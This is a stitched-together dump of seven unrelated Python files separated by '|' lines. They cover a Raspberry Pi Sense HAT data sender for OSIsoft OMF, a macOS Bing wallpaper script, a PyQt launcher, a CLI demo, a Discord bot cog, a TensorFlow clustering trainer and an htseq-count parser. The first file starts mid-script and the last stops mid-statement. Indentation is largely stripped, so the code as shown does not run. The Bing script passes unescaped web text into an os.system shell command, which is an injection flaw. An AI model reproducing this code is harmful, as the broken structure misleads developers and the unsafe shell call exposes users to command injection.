# In this example, this function simply generates two random values for the sensor values,
# but here is where you could change this function to reference a library that actually
# reads from sensors attached to the device that's running the script
def create_data_values_message():
# Get the current timestamp in ISO format
timestamp = datetime.datetime.utcnow().isoformat() + 'Z'
# Read sensors
pitch, roll, yaw = sense.get_orientation_degrees().values()
degreesToNorth = sense.get_compass()
accelerationx, accelerationy, accelerationz = sense.get_accelerometer_raw().values()
# Update the sense hat display!
update_sense_hat_display(accelerationz)
# Assemble a JSON object containing the streamId and any data values
return [
{
"containerid": DATA_VALUES_CONTAINER_ID,
"values": [
{
"Time": timestamp,
# Again, in this example,
# we're just sending along random values for these two "sensors"
#"Raw Sensor Reading 1": 100*random.random(),
#"Raw Sensor Reading 2": 100*random.random()
"Humidity": sense.get_humidity(),
"Temperature": (sense.get_temperature_from_humidity() * 9/5 + 32),
"Pitch": pitch,
"Roll": roll,
"Yaw": yaw,
"Heading": degreesToNorth,
"X Acceleration": accelerationx,
"Y Acceleration": accelerationy,
"Z Acceleration": accelerationz
# If you wanted to read, for example, the digital GPIO pins
# 4 and 5 on a Raspberry PI,
# you would add to the earlier package import section:
# import RPi.GPIO as GPIO
# then add the below 3 lines to the above initialize_sensors
# function to set up the GPIO pins:
# GPIO.setmode(GPIO.BCM)
# GPIO.setup(4, GPIO.IN)
# GPIO.setup(5, GPIO.IN)
# and then lastly, you would change the two Raw Sensor reading lines above to
# "Raw Sensor Reading 1": GPIO.input(4),
# "Raw Sensor Reading 2": GPIO.input(5)
}
]
}
]
# ************************************************************************
# Helper function: OPTIONAL: updates sense hat display
# ************************************************************************
def update_sense_hat_display(newValue):
# Append the most recent value to end of the recent values array
recentReadings.append(newValue)
# Remove the oldest value from bin 0 of the recent values array
removedValue = recentReadings.pop(0)
# Get the max and min values of the recent values array
maxReading = max(recentReadings)
minReading = min(recentReadings)
# Scale all values in the recent values array using the max
# and the range (max - min); values now range from 0 to 7
scaledRecentReadings = []
for i in range(0, len(recentReadings), 1):
scaledRecentReading = 0
try:
scaledRecentReading = int(round(7 * abs(recentReadings[i] - minReading)/abs(maxReading - minReading)))
except:
print("Error when computing scaled reading; defaulting to 0")
# Subtract the scaled value from 7, to 'invert' the value,
# since the LED display is mounted upside-down
scaledRecentReadings.append(7 - scaledRecentReading)
# --------------------------------------------
# Test the hour of day; if it's too late or early, don't show the lights
currentHour = datetime.datetime.now().hour
    if (NIGHT_MODE_ENABLED and ((currentHour >= 22) or (currentHour < 7))):
# If it's too late or early, sleep 1 second, then turn off the lights
time.sleep(1)
sense.clear()
else:
# Otherwise, turn on the LEDs!
# Loop through the array, right to left (7 to 0);
# This lights up LEDs on the display one column at a time
for LEDcolumnIndex in range(7, -1, -1):
# Loop through all 8 LEDs in this column of LEDs
for LEDrowIndex in range(0, 8, 1):
# Determine the color for this LED by
# comparing the row (0-7) that this LED is in
# to the corresponding scaled recent reading
if LEDrowIndex >= scaledRecentReadings[LEDcolumnIndex]:
# In this case, the row number determines the LED color
# Higher row numbers will get "warmer" colors
sense.set_pixel(LEDcolumnIndex,LEDrowIndex,
RED_TO_GREEN_COLOR_BAR[LEDrowIndex])
else :
# Otherwise, by default, set this LED to the background color
sense.set_pixel(LEDcolumnIndex,LEDrowIndex,
DEFAULT_BACKGROUND_COLOR)
# ************************************************************************
# Helper function: REQUIRED: wrapper function for sending an HTTPS message
# ************************************************************************
# Define a helper function to allow easily sending web request messages;
# this function can later be customized to allow you to port this script to other languages.
# All it does is take in a data object and a message type, and it sends an HTTPS
# request to the target OMF endpoint
def send_omf_message_to_endpoint(action, message_type, message_json):
try:
# Assemble headers that contain the producer token and message type
# Note: in this example, the only action that is used is "create",
# which will work totally fine;
# to expand this application, you could modify it to use the "update"
# action to, for example, modify existing AF element template types
web_request_header = {
'producertoken': PRODUCER_TOKEN,
'messagetype': message_type,
'action': action,
'messageformat': 'JSON',
'omfversion': '1.0'
}
        # !!! Note: comment out the below line if you do not want to print each outgoing message
        print('\nOutgoing message: ' + json.dumps(message_json))
# Send the request, and collect the response; json.dumps is used to
# properly format the message JSON so that it can be sent as a web request
response = requests.post(
TARGET_URL,
headers=web_request_header,
data=json.dumps(message_json),
verify=VERIFY_SSL,
timeout=WEB_REQUEST_TIMEOUT_SECONDS
)
# Print a debug message, if desired; note: you should receive a
# response code 200 or 202 if the request was successful!
print(
'Response from sending a message of type ' +
'"{0}" with action "{1}": {2} {3}'.format(
message_type,
action,
response.status_code,
response.text
)
)
except Exception as ex:
# Log any error, if it occurs
print(str(datetime.datetime.now()) + " Error during web request: " + str(ex))
# ************************************************************************
# Turn off HTTPS warnings, if desired
# (if the default certificate configuration was used by the PI Connector)
# ************************************************************************
# Suppress insecure HTTPS warnings, if an untrusted certificate is used by the target endpoint
# Remove this if targeting trusted endpoints
if not VERIFY_SSL:
requests.packages.urllib3.disable_warnings()
print(
'\n--- Setup: targeting endpoint "' + TARGET_URL + '"...' +
'\n--- Now sending types, defining containers, and creating assets and links...' +
'\n--- (Note: a successful message will return a 20X response code.)\n'
)
# ************************************************************************
# Create a JSON packet to define the types of streams that will be sent
# ************************************************************************
DYNAMIC_TYPES_MESSAGE_JSON = [
# ************************************************************************
# There are several different message types that will be used by this script, but
# you can customize this script for your own needs by modifying the types:
# First, you can modify the "AssetsType", which will allow you to customize which static
# attributes are added to the new PI AF Element that will be created, and second,
# you can modify the "DataValuesType", which will allow you to customize this script to send
# additional sensor values, in addition to (or instead of) the two shown here
# This values type is going to be used to send real-time values; feel free to rename the
# values from "Raw Sensor Reading 1" to, say, "Temperature", or "Pressure"
# Note:
    # all keywords ("id", "type", "classification", etc.) are case sensitive!
# For a list of the specific keywords used in these messages,
# see http://omf-docs.readthedocs.io/
{
"id": DATA_VALUES_MESSAGE_TYPE_NAME,
"type": "object",
"classification": "dynamic",
"properties": {
"Time": {
"format": "date-time",
"type": "string",
"isindex": True
},
"Humidity": {
"type": "number"
},
"Temperature": {
"type": "number"
},
"Pitch": {
"type": "number"
},
"Roll": {
"type": "number"
},
"Yaw": {
"type": "number"
},
"Heading": {
"type": "number"
},
"X Acceleration": {
"type": "number"
},
"Y Acceleration": {
"type": "number"
},
"Z Acceleration": {
"type": "number"
}
# For example, to allow you to send a string-type live data value,
# such as "Status", you would add
#"Status": {
# "type": "string"
#}
}
}
]
# ************************************************************************
# Send the DYNAMIC types message, so that these types can be referenced in all later messages
# ************************************************************************
send_omf_message_to_endpoint("create", "Type", DYNAMIC_TYPES_MESSAGE_JSON)
# !!! Note: if sending data to OCS, static types are not included!
if not SEND_DATA_TO_OSISOFT_CLOUD_SERVICES:
STATIC_TYPES_MESSAGE_JSON = [
# This asset type is used to define a PI AF Element that will be created;
# this type also defines two static string attributes that will be created
# as well; feel free to rename these or add additional
# static attributes for each Element (PI Point attributes will be added later)
# The name of this type will also end up being part of the name of the PI AF Element template
# that is automatically created
{
"id": ASSETS_MESSAGE_TYPE_NAME,
"type": "object",
"classification": "static",
"properties": {
"Name": {
"type": "string",
"isindex": True
},
"Device Type": {
"type": "string"
},
"Location": {
"type": "string"
},
"Data Ingress Method": {
"type": "string"
}
# For example, to add a number-type static
# attribute for the device model, you would add
# "Model": {
# "type": "number"
#}
}
}
]
# ************************************************************************
# Send the STATIC types message, so that these types can be referenced in all later messages
# ************************************************************************
send_omf_message_to_endpoint("create", "Type", STATIC_TYPES_MESSAGE_JSON)
# ************************************************************************
# Create a JSON packet to define containerids and the type
# (using the types listed above) for each new data events container
# ************************************************************************
# The device name that you specified earlier will be used as the AF Element name!
NEW_AF_ELEMENT_NAME = DEVICE_NAME
CONTAINERS_MESSAGE_JSON = [
{
"id": DATA_VALUES_CONTAINER_ID,
"typeid": DATA_VALUES_MESSAGE_TYPE_NAME
}
]
# ************************************************************************
# Send the container message, to instantiate this particular container;
# we can now directly start sending data to it using its Id
# ************************************************************************
send_omf_message_to_endpoint("create", "Container", CONTAINERS_MESSAGE_JSON)
# !!! Note: if sending data to OCS, static types are not included!
if not SEND_DATA_TO_OSISOFT_CLOUD_SERVICES:
# ************************************************************************
    # Create a JSON packet containing the asset and
# linking data for the PI AF asset that will be made
# ************************************************************************
# Here is where you can specify values for the static PI AF attributes;
# in this case, we're auto-populating the Device Type,
# but you can manually hard-code in values if you wish
# we also add the LINKS to be made, which will both position the new PI AF
# Element, so it will show up in AF, and will associate the PI Points
# that will be created with that Element
ASSETS_AND_LINKS_MESSAGE_JSON = [
{
# This will end up creating a new PI AF Element with
# this specific name and static attribute values
"typeid": ASSETS_MESSAGE_TYPE_NAME,
"values": [
{
"Name": NEW_AF_ELEMENT_NAME,
"Device Type": (
platform.machine() + " - " + platform.platform() + " - " + platform.processor()
),
"Location": DEVICE_LOCATION,
"Data Ingress Method": "OMF"
}
]
},
{
"typeid": "__Link",
"values": [
# This first link will locate such a newly created AF Element under
# the root PI element targeted by the PI Connector in your target AF database
            # This was specified in the Connector Relay Admin page; note that a new
# parent element, with the same name as the PRODUCER_TOKEN, will also be made
{
"Source": {
"typeid": ASSETS_MESSAGE_TYPE_NAME,
"index": "_ROOT"
},
"Target": {
"typeid": ASSETS_MESSAGE_TYPE_NAME,
"index": NEW_AF_ELEMENT_NAME
}
},
# This second link will map new PI Points (created by messages
            # sent to the data values container) to a newly created element
{
"Source": {
"typeid": ASSETS_MESSAGE_TYPE_NAME,
"index": NEW_AF_ELEMENT_NAME
},
"Target": {
"containerid": DATA_VALUES_CONTAINER_ID
}
}
]
}
]
# ************************************************************************
# Send the message to create the PI AF asset; it won't appear in PI AF,
# though, because it hasn't yet been positioned...
# ************************************************************************
send_omf_message_to_endpoint("create", "Data", ASSETS_AND_LINKS_MESSAGE_JSON)
# ************************************************************************
# Initialize sensors prior to sending data (if needed), using the function defined earlier
# ************************************************************************
initialize_sensors()
# ************************************************************************
# Finally, loop indefinitely, sending random events
# conforming to the value type that we defined earlier
# ************************************************************************
print(
'\n--- Now sending live data every ' + str(NUMBER_OF_SECONDS_BETWEEN_VALUE_MESSAGES) +
' second(s) for device "' + NEW_AF_ELEMENT_NAME + '"... (press CTRL+C to quit at any time)\n'
)
if not SEND_DATA_TO_OSISOFT_CLOUD_SERVICES:
print(
'--- (Look for a new AF Element named "' + NEW_AF_ELEMENT_NAME + '".)\n'
)
while True:
# Call the custom function that builds a JSON object that
# contains new data values; see the beginning of this script
VALUES_MESSAGE_JSON = create_data_values_message()
# Send the JSON message to the target URL
send_omf_message_to_endpoint("create", "Data", VALUES_MESSAGE_JSON)
# Send the next message after the required interval
time.sleep(NUMBER_OF_SECONDS_BETWEEN_VALUE_MESSAGES)
|
# -*- coding: utf-8 -*-
import os
import urllib
import requests
import Foundation
from appscript import app, mactypes
import subprocess
class BingImageInfo:
def __init__(self):
self.jsonUrl = "http://www.bing.com/HPImageArchive.aspx?format=js&idx=0&n=1&mkt=en-US"
self.response = requests.get(self.jsonUrl).json()
def get_image_url(self):
image_url = self.response['images'][0]['url']
# When using vpn, the server address of bing image may be different between countries.
if image_url.startswith("http://s.cn.bing.net"):
return image_url
elif not image_url.startswith("https://www.bing.com") and not image_url.startswith("http://www.bing.com"):
image_url = "https://www.bing.com" + image_url
return image_url
def get_story(self):
return self.response['images'][0]['copyright']
class EnjoyBing:
def __init__(self, image_location_prefix):
self.bing_image_info = BingImageInfo()
image_url = self.bing_image_info.get_image_url()
image_path = image_location_prefix + image_url.rsplit('/', 1)[-1]
urllib.urlretrieve(image_url, image_path)
self.image_path = image_path
def set_wallpaper(self):
set_wallpaper_script = """tell application "Finder"
set desktop picture to POSIX file "%s"
end tell"""
s = Foundation.NSAppleScript.alloc().initWithSource_(set_wallpaper_script % self.image_path)
s.executeAndReturnError_(None)
def pop_up_story_window(self):
bing_image_story = self.bing_image_info.get_story()
command_show_story_info = "osascript -e \'tell app \"System Events\" to display notification \"" + bing_image_story.encode('utf-8') + "\" with title \"Bing Image Story\"\'"
os.system(command_show_story_info)
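# Minimal usage sketch (assumes a writable download directory; the path below is
# illustrative only):
#   if __name__ == '__main__':
#       enjoy_bing = EnjoyBing(os.path.expanduser('~/Pictures/'))
#       enjoy_bing.set_wallpaper()
#       enjoy_bing.pop_up_story_window()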
|
#!/usr/bin/env python3
# Copyright 2017 University of Maryland.
#
# This file is part of Sesame. It is subject to the license terms in the file
# LICENSE.rst found in the top-level directory of this distribution.
from sesame.ui import mainwindow
from PyQt5.QtWidgets import QApplication
from PyQt5 import QtGui
import sys
import ctypes
if sys.platform == 'win32':
appID = 'sesameGUI'
ctypes.windll.shell32.SetCurrentProcessExplicitAppUserModelID(appID)
app = QApplication(sys.argv)
stylesheet = """
QGroupBox {
border: 1px solid gray;
border-radius: 9px;
margin-top: 0.5em;
font-weight: bold;
}
QGroupBox::title {
subcontrol-origin: margin;
left: 10px;
padding: 0 3px 0 3px;
}
"""
app.setStyleSheet(stylesheet)
window = mainwindow.Window()
sys.exit(app.exec_())
|
#!/usr/bin/env python
from bourbaki.application.cli import CommandLineInterface, ArgSource
from typing import *
cli = CommandLineInterface(
prog="foo.py", arg_lookup_order=(ArgSource.CLI, ArgSource.DEFAULTS)
)
@cli.definition
class Foo:
"""command line interface called foo"""
def __init__(self, x: int = 42, y: Optional[List[bool]] = None):
"""
set it up
:param x: an int
:param y: a list of bools
"""
self.x = x
self.y = y
def wut(
self,
tup: Tuple[Tuple[int, int], str, Tuple[complex, ...]],
opt: Optional[List[Set[int]]] = None,
):
"""
wut to the wut
:param tup: crazy nested tuple
:param opt: nested lists
:return:
"""
print(tup)
print(opt)
if __name__ == "__main__":
cli.run()
|
import discord
from discord.ext import commands
from random import shuffle, randint
from asyncio import sleep
from utils.generalFuncs import return_weather, NewsFromBBC, indianNews
class generalCog(commands.Cog):
def __init__(self, bot):
self.bot = bot
self.subChannel = []
@commands.command(name = 'start')
async def ping(self, ctx):
await ctx.channel.send("Hey {} . I'm still awake btw....".format(ctx.message.author.mention))
@commands.command(name = 'help')
async def helpHim(self, ctx):
async with ctx.channel.typing():
fileManager = open('res/bot_intro.txt', 'r')
bot_intro = fileManager.read()
bot_intro = bot_intro.replace('Srikar', self.bot.appInfo.owner.mention)
fileManager.close()
await ctx.channel.send(bot_intro)
@commands.command(name = 'weatherUpdate')
async def send_weather(self, ctx):
city = ctx.message.content[15:]
await ctx.channel.send(return_weather(city))
@commands.command(name = 'intNews')
async def send_int_news(self, ctx):
async with ctx.channel.typing():
await ctx.channel.send(NewsFromBBC())
@commands.command(name = 'indNews')
async def send_ind_news(self, ctx):
async with ctx.channel.typing():
await ctx.channel.send(indianNews())
@commands.command(name = 'xkcd') # Thanks Raghav. Asyncio is the best indeed. So is XKCD
async def startXKCD(self, ctx):
if([ctx.guild, ctx.channel] in self.subChannel):
await ctx.channel.send("Already subscribed, wait for the next meme ;)")
else:
self.subChannel.append([ctx.guild, ctx.channel])
await ctx.channel.send("XKCD service coming up")
l = [i for i in range(1, 2300, 1)]
shuffle(l)
while(len(l) > 0):
                index = randint(0, len(l) - 1)
number = l[index]
l.pop(index)
url = "https://xkcd.com/" + str(number)
await ctx.channel.send("@everyone here's your xkcd : " + url)
await sleep(60 * 60 * 4)
@commands.command(name = 'owner')
async def send_owner(self, ctx):
await ctx.channel.send('{} owns me. Literally!'.format(self.bot.appInfo.owner.mention))
@commands.command()
async def send_message(self, ctx, *, message : str):
await ctx.channel.send(message)
def setup(bot):
bot.add_cog(generalCog(bot))
|
import argparse
import math
import subprocess
from datetime import datetime
import numpy as np
import tensorflow as tf
import socket
import importlib
import os,ast
import sys
from sklearn.cluster import KMeans
import h5py
np.set_printoptions(edgeitems=1000)
from scipy.optimize import linear_sum_assignment
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
sys.path.append(BASE_DIR)
sys.path.append(os.path.join(BASE_DIR,'..', 'models'))
sys.path.append(os.path.join(BASE_DIR,'..' ,'utils'))
import provider
import gapnet_classify as MODEL
parser = argparse.ArgumentParser()
parser.add_argument('--max_dim', type=int, default=3, help='Dimension of the encoding layer [Default: 3]')
parser.add_argument('--n_clusters', type=int, default=3, help='Number of clusters [Default: 3]')
parser.add_argument('--gpu', type=int, default=0, help='GPU to use [default: GPU 0]')
parser.add_argument('--model', default='gapnet_classify', help='Model name [default: gapnet_classify]')
parser.add_argument('--log_dir', default='log', help='Log dir [default: log]')
parser.add_argument('--num_point', type=int, default=100, help='Point Number [default: 100]')
parser.add_argument('--max_epoch', type=int, default=200, help='Epoch to run [default: 200]')
parser.add_argument('--batch_size', type=int, default=512, help='Batch Size during training [default: 512]')
parser.add_argument('--learning_rate', type=float, default=0.001, help='Initial learning rate [default: 0.001]')
parser.add_argument('--momentum', type=float, default=0.9, help='Initial momentum [default: 0.9]')
parser.add_argument('--optimizer', default='adam', help='adam or momentum [default: adam]')
parser.add_argument('--decay_step', type=int, default=500000, help='Decay step for lr decay [default: 500000]')
parser.add_argument('--wd', type=float, default=0.0, help='Weight Decay [Default: 0.0]')
parser.add_argument('--decay_rate', type=float, default=0.5, help='Decay rate for lr decay [default: 0.5]')
parser.add_argument('--output_dir', type=str, default='train_results', help='Directory that stores all training logs and trained models')
parser.add_argument('--data_dir', default='../h5', help='directory with data [default: hdf5_data]')
parser.add_argument('--nfeat', type=int, default=8, help='Number of features [default: 8]')
parser.add_argument('--ncat', type=int, default=20, help='Number of categories [default: 20]')
parser.add_argument('--test', action='store_true', default=False,help='Test training')
FLAGS = parser.parse_args()
H5_DIR = FLAGS.data_dir
EPOCH_CNT = 0
MAX_PRETRAIN = 20
BATCH_SIZE = FLAGS.batch_size
NUM_POINT = FLAGS.num_point
NUM_FEAT = FLAGS.nfeat
NUM_CLASSES = FLAGS.ncat
MAX_EPOCH = FLAGS.max_epoch
BASE_LEARNING_RATE = FLAGS.learning_rate
GPU_INDEX = FLAGS.gpu
MOMENTUM = FLAGS.momentum
OPTIMIZER = FLAGS.optimizer
DECAY_STEP = FLAGS.decay_step
DECAY_RATE = FLAGS.decay_rate
#MODEL = importlib.import_module(FLAGS.model) # import network module
MODEL_FILE = os.path.join(BASE_DIR, 'models', FLAGS.model+'.py')
LOG_DIR = os.path.join('..','logs',FLAGS.log_dir)
if not os.path.exists(LOG_DIR): os.makedirs(LOG_DIR)
os.system('cp %s.py %s' % (MODEL_FILE, LOG_DIR)) # bkp of model def
os.system('cp train_kmeans.py %s' % (LOG_DIR)) # bkp of train procedure
LOG_FOUT = open(os.path.join(LOG_DIR, 'log_dkm.txt'), 'w')
LOG_FOUT.write(str(FLAGS)+'\n')
BN_INIT_DECAY = 0.5
BN_DECAY_DECAY_RATE = 0.5
BN_DECAY_DECAY_STEP = float(DECAY_STEP)
BN_DECAY_CLIP = 0.99
LEARNING_RATE_CLIP = 1e-5
HOSTNAME = socket.gethostname()
TRAIN_FILES = provider.getDataFiles(os.path.join(H5_DIR, 'train_files_wztop.txt'))
TEST_FILES = provider.getDataFiles(os.path.join(H5_DIR, 'test_files_wztop.txt'))
def log_string(out_str):
LOG_FOUT.write(out_str+'\n')
LOG_FOUT.flush()
print(out_str)
def get_learning_rate(batch):
learning_rate = tf.train.exponential_decay(
BASE_LEARNING_RATE, # Base learning rate.
batch * BATCH_SIZE, # Current index into the dataset.
DECAY_STEP, # Decay step.
DECAY_RATE, # Decay rate.
staircase=True)
learning_rate = tf.maximum(learning_rate, LEARNING_RATE_CLIP) # CLIP THE LEARNING RATE!
return learning_rate
def get_bn_decay(batch):
bn_momentum = tf.train.exponential_decay(
BN_INIT_DECAY,
batch*BATCH_SIZE,
BN_DECAY_DECAY_STEP,
BN_DECAY_DECAY_RATE,
staircase=True)
bn_decay = tf.minimum(BN_DECAY_CLIP, 1 - bn_momentum)
return bn_decay
def train():
with tf.Graph().as_default():
with tf.device('/gpu:'+str(GPU_INDEX)):
pointclouds_pl, labels_pl = MODEL.placeholder_inputs(BATCH_SIZE, NUM_POINT,NUM_FEAT)
is_training_pl = tf.placeholder(tf.bool, shape=())
# Note the global_step=batch parameter to minimize.
# That tells the optimizer to helpfully increment the 'batch' parameter for you every time it trains.
batch = tf.Variable(0)
alpha = tf.placeholder(dtype=tf.float32, shape=())
bn_decay = get_bn_decay(batch)
tf.summary.scalar('bn_decay', bn_decay)
print("--- Get model and loss")
pred , max_pool = MODEL.get_model(pointclouds_pl, is_training=is_training_pl,
bn_decay=bn_decay,
num_class=NUM_CLASSES, weight_decay=FLAGS.wd,
)
class_loss = MODEL.get_focal_loss(pred, labels_pl,NUM_CLASSES)
mu = tf.Variable(tf.zeros(shape=(FLAGS.n_clusters,FLAGS.max_dim)),name="mu",trainable=True) #k centroids
kmeans_loss, stack_dist= MODEL.get_loss_kmeans(max_pool,mu, FLAGS.max_dim,
FLAGS.n_clusters,alpha)
full_loss = 10*kmeans_loss + class_loss
print("--- Get training operator")
# Get training operator
learning_rate = get_learning_rate(batch)
tf.summary.scalar('learning_rate', learning_rate)
if OPTIMIZER == 'momentum':
optimizer = tf.train.MomentumOptimizer(learning_rate, momentum=MOMENTUM)
elif OPTIMIZER == 'adam':
optimizer = tf.train.AdamOptimizer(learning_rate)
train_op_full = optimizer.minimize(full_loss, global_step=batch)
train_op = optimizer.minimize(class_loss, global_step=batch)
# Add ops to save and restore all the variables.
saver = tf.train.Saver()
# Create a session
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
config.allow_soft_placement = True
config.log_device_placement = False
sess = tf.Session(config=config)
sess.run(tf.global_variables_initializer())
# Add summary writers
merged = tf.summary.merge_all()
train_writer = tf.summary.FileWriter(os.path.join(LOG_DIR, 'train'), sess.graph)
test_writer = tf.summary.FileWriter(os.path.join(LOG_DIR, 'test'), sess.graph)
# Init variables
print("Total number of weights for the model: ",np.sum([np.prod(v.get_shape().as_list()) for v in tf.trainable_variables()]))
ops = {'pointclouds_pl': pointclouds_pl,
'labels_pl':labels_pl,
'is_training_pl': is_training_pl,
'max_pool':max_pool,
'pred': pred,
'alpha': alpha,
'mu': mu,
'stack_dist':stack_dist,
'class_loss': class_loss,
'kmeans_loss': kmeans_loss,
'train_op': train_op,
'train_op_full': train_op_full,
'merged': merged,
'step': batch,
'learning_rate':learning_rate
}
for epoch in range(MAX_EPOCH):
log_string('**** EPOCH %03d ****' % (epoch))
sys.stdout.flush()
is_full_training = epoch > MAX_PRETRAIN
max_pool = train_one_epoch(sess, ops, train_writer,is_full_training)
if epoch == MAX_PRETRAIN:
centers = KMeans(n_clusters=FLAGS.n_clusters).fit(np.squeeze(max_pool))
centers = centers.cluster_centers_
sess.run(tf.assign(mu,centers))
eval_one_epoch(sess, ops, test_writer,is_full_training)
if is_full_training:
save_path = saver.save(sess, os.path.join(LOG_DIR, 'cluster.ckpt'))
else:
save_path = saver.save(sess, os.path.join(LOG_DIR, 'model.ckpt'))
log_string("Model saved in file: %s" % save_path)
def get_batch(data,label, start_idx, end_idx):
batch_label = label[start_idx:end_idx]
batch_data = data[start_idx:end_idx,:,:]
return batch_data, batch_label
def cluster_acc(y_true, y_pred):
"""
Calculate clustering accuracy. Require scikit-learn installed
"""
y_true = y_true.astype(np.int64)
D = max(y_pred.max(), y_true.max()) + 1
w = np.zeros((D, D), dtype=np.int64)
for i in range(y_pred.size):
w[y_pred[i], y_true[i]] += 1
ind = linear_sum_assignment(w.max() - w)
ind = np.asarray(ind)
ind = np.transpose(ind)
return sum([w[i, j] for i, j in ind]) * 1.0 / y_pred.size
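# Illustrative check of the Hungarian matching above (labels permuted between
# prediction and ground truth still count as a perfect clustering):
#   cluster_acc(np.array([0, 0, 1, 1]), np.array([1, 1, 0, 0]))  -> 1.0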
def train_one_epoch(sess, ops, train_writer,is_full_training):
""" ops: dict mapping from string to tf ops """
is_training = True
train_idxs = np.arange(0, len(TRAIN_FILES))
acc = loss_sum = 0
y_pool = []
for fn in range(len(TRAIN_FILES)):
#log_string('----' + str(fn) + '-----')
current_file = os.path.join(H5_DIR,TRAIN_FILES[train_idxs[fn]])
current_data, current_label, current_cluster = provider.load_h5_data_label_seg(current_file)
current_label = np.squeeze(current_label)
file_size = current_data.shape[0]
num_batches = file_size // BATCH_SIZE
if FLAGS.test: num_batches = 5
log_string(str(datetime.now()))
for batch_idx in range(num_batches):
start_idx = batch_idx * BATCH_SIZE
end_idx = (batch_idx+1) * BATCH_SIZE
batch_data, batch_label = get_batch(current_data, current_label,start_idx, end_idx)
cur_batch_size = end_idx-start_idx
#print(batch_weight)
feed_dict = {ops['pointclouds_pl']: batch_data,
ops['labels_pl']: batch_label,
ops['is_training_pl']: is_training,
ops['alpha']: 5*(EPOCH_CNT-MAX_PRETRAIN+1),
}
if is_full_training:
summary, step, _, loss_val,dist,lr = sess.run([ops['merged'], ops['step'],
ops['train_op_full'], ops['kmeans_loss'],
ops['stack_dist'],ops['learning_rate']
],
feed_dict=feed_dict)
batch_cluster = np.array([np.where(r==1)[0][0] for r in current_cluster[start_idx:end_idx]])
cluster_assign = np.zeros((cur_batch_size), dtype=int)
for i in range(cur_batch_size):
index_closest_cluster = np.argmin(dist[:, i])
cluster_assign[i] = index_closest_cluster
acc+=cluster_acc(batch_cluster,cluster_assign)
else:
summary, step, _, loss_val,max_pool,lr = sess.run([ops['merged'], ops['step'],
ops['train_op'], ops['class_loss'],
ops['max_pool'],ops['learning_rate']],
feed_dict=feed_dict)
if len(y_pool)==0:
y_pool=np.squeeze(max_pool)
else:
y_pool=np.concatenate((y_pool,np.squeeze(max_pool)),axis=0)
loss_sum += np.mean(loss_val)
train_writer.add_summary(summary, step)
log_string('learning rate: %f' % (lr))
log_string('train mean loss: %f' % (loss_sum / float(num_batches)))
log_string('train clustering accuracy: %f' % (acc/ float(num_batches)))
return y_pool
def eval_one_epoch(sess, ops, test_writer,is_full_training):
""" ops: dict mapping from string to tf ops """
global EPOCH_CNT
is_training = False
test_idxs = np.arange(0, len(TEST_FILES))
# Test on all data: last batch might be smaller than BATCH_SIZE
loss_sum = acc =0
acc_kmeans = 0
for fn in range(len(TEST_FILES)):
#log_string('----' + str(fn) + '-----')
current_file = os.path.join(H5_DIR,TEST_FILES[test_idxs[fn]])
current_data, current_label, current_cluster = provider.load_h5_data_label_seg(current_file)
current_label = np.squeeze(current_label)
file_size = current_data.shape[0]
num_batches = file_size // BATCH_SIZE
if FLAGS.test: num_batches = 5
for batch_idx in range(num_batches):
start_idx = batch_idx * BATCH_SIZE
end_idx = (batch_idx+1) * BATCH_SIZE
batch_data, batch_label = get_batch(current_data, current_label,start_idx, end_idx)
cur_batch_size = end_idx-start_idx
feed_dict = {ops['pointclouds_pl']: batch_data,
ops['is_training_pl']: is_training,
ops['labels_pl']: batch_label,
ops['alpha']: 2*(EPOCH_CNT-MAX_PRETRAIN+1),
}
if is_full_training:
summary, step, loss_val, max_pool,dist,mu= sess.run([ops['merged'], ops['step'],
ops['kmeans_loss'],
ops['max_pool'],ops['stack_dist'],
ops['mu']
],
feed_dict=feed_dict)
if batch_idx==0:
log_string("mu: {}".format(mu))
batch_cluster = np.array([np.where(r==1)[0][0] for r in current_cluster[start_idx:end_idx]])
cluster_assign = np.zeros((cur_batch_size), dtype=int)
for i in range(cur_batch_size):
index_closest_cluster = np.argmin(dist[:, i])
cluster_assign[i] = index_closest_cluster
acc+=cluster_acc(batch_cluster,cluster_assign)
else:
summary, step, loss_val= sess.run([ops['merged'], ops['step'],
ops['class_loss']
],
feed_dict=feed_dict)
test_writer.add_summary(summary, step)
loss_sum += np.mean(loss_val)
total_loss = loss_sum*1.0 / float(num_batches)
log_string('test mean loss: %f' % (total_loss))
log_string('testing clustering accuracy: %f' % (acc / float(num_batches)))
EPOCH_CNT += 1
if __name__ == "__main__":
log_string('pid: %s'%(str(os.getpid())))
train()
LOG_FOUT.close()
|
import sys
def resolve(label):
"""
Given a result from htseq-count, resolve label
"""
if len(label) == 0:
return 'ID'
# one label -> return label
elif '__' not in label:
pieces = label.split(':')
return '{}:{}'.format(pieces[2], pieces[-1][:-1])
# no feature
elif 'no_feature' in label:
return 'no_feature'
# not aligned
elif 'not_aligned' in label:
return 'not_aligned'
# ambiguous mapping
elif 'ambiguous' in label:
if ('exon' in label):
# map to both exons and introns
if ('intron' in label):
ids = label.split('[')[1][:-2].split('+')
gene_ids = list(set([x.split(':')[-1] for x in ids]))
# if it maps to one exon and one intron of the same transcript, call intron/exon junction
if len(ids) == 2:
transcript_ids = [x.split(':')[1] for x in ids]
if (transcript_ids[0] == transcript_ids[1]):
return 'intronexonjunction:{}'.format(gene_ids[0])
# if it maps to exons and introns of different transcripts, same gene, call gene + ambiguous
if len(gene_ids) == 1:
return 'ambiguous:{}'.format(gene_ids[0])
# otherwise, just call ambiguous
return 'ambiguous_intron_exon'
# if it maps to exons of the same gene, call gene, otherwise call ambiguous
ids = label.split('[')[1][:-2].split('+')
ids = list(set([x.split(':')[-1] for x in ids]))
if len(ids) != 1:
return 'ambiguous_mult_genes'
else:
return 'exon:{}'.format(ids[0])
# if it maps to introns of the same gene, call gene, otherwise call ambiguous
elif ('intron' in label):
ids = label.split('[')[1][:-2].split('+')
ids = list(set([x.split(':')[-1] for x in ids]))
if len(ids) != 1:
return 'ambiguous_mult_genes'
else:
return 'intron:{}'.format(ids[0])
else:
return 'other'
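# Illustrative behaviour on simple htseq-count labels (format assumed from the
# parsing above):
#   resolve('')                 -> 'ID'
#   resolve('__no_feature\n')   -> 'no_feature'
#   resolve('__not_aligned\n')  -> 'not_aligned'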
if __name__ == '__main__':
INFILE, OUTFILE = sys.argv[1:]
current = ''
count = 'count'
count_dict = {}
i = 0
# read annotations, compile counts and resolve labels
with open(INFILE, 'r') as infile:
for line in infile:
if line != current:
resolved = resolve(current)
if resolved in count_dict:
count_dict[resolved] += count
else:
count_dict[resolved] = count
current = line
count = 1
else:
count += 1
    # flush the final group, resolving its label like all the others
    resolved = resolve(current)
    if resolved in count_dict:
